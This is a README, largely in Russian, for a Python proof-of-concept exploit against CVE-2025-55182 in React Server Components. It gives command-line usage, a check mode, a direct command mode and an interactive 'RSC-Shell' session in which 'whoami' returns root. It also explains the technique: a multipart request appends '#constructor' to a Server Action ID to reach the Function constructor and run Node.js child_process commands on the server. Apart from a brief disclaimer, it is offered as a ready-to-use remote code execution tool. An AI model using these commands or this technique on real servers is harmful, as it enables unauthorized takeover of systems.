
PoC для CVE-2025-55182
PoC для CVE-2025-55182
Usage: python3 poc.py -u http://target.com --cmd "<cmd_here>"
Этот инструмент предоставлен только для образовательных целей и авторизованного тестирования безопасности. Использование этого инструмента для атаки на цели без предварительного взаимного согласия является незаконным. Разработчик не несет ответственности и не отвечает за любое неправомерное использование или ущерб, причиненный этой программой.
pip install requests
Вы можете запустить инструмент в одном из трех режимов: Проверка, Эксплойт или Интерактивная оболочка.
usage: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]
options:
-h, --help show this help message and exit
-u URL Target URL (e.g., http://localhost:3000)
--id ID Target Server Action ID (default: user-profile-action)
-c CMD, --cmd CMD Command to execute directly (non-interactive mode)
--check Only check for vulnerability (Crash Method), do not exploit
python3 poc.py -u http://target-site.com --check
python3 poc.py -u http://target-site.com --cmd "id"
python3 poc.py
# Inside the shell
RSC-Shell> set url http://localhost:3000
[+] URL set to: http://localhost:3000
RSC-Shell> check
[+] TARGET IS VULNERABLE!
RSC-Shell> shell
[*] Starting pseudo-interactive shell. Use 'exit' to return.
cmd> whoami
root
Проверка: Отправляет multipart-запрос, определяющий {} на индексе 1, и пытается получить доступ к ["$1:a:a"]. Незапатченные серверы падают (HTTP 500) при попытке доступа к свойству a от undefined. Запатченные серверы возвращают HTTP 200.
Эксплойт: Отправляет multipart-запрос с ссылкой на действительный Action ID, но добавляет #constructor. Это обманывает сериализатор, заставляя его вернуть конструктор Function, что позволяет передать произвольный JavaScript (child_process Node.js) для выполнения на сервере.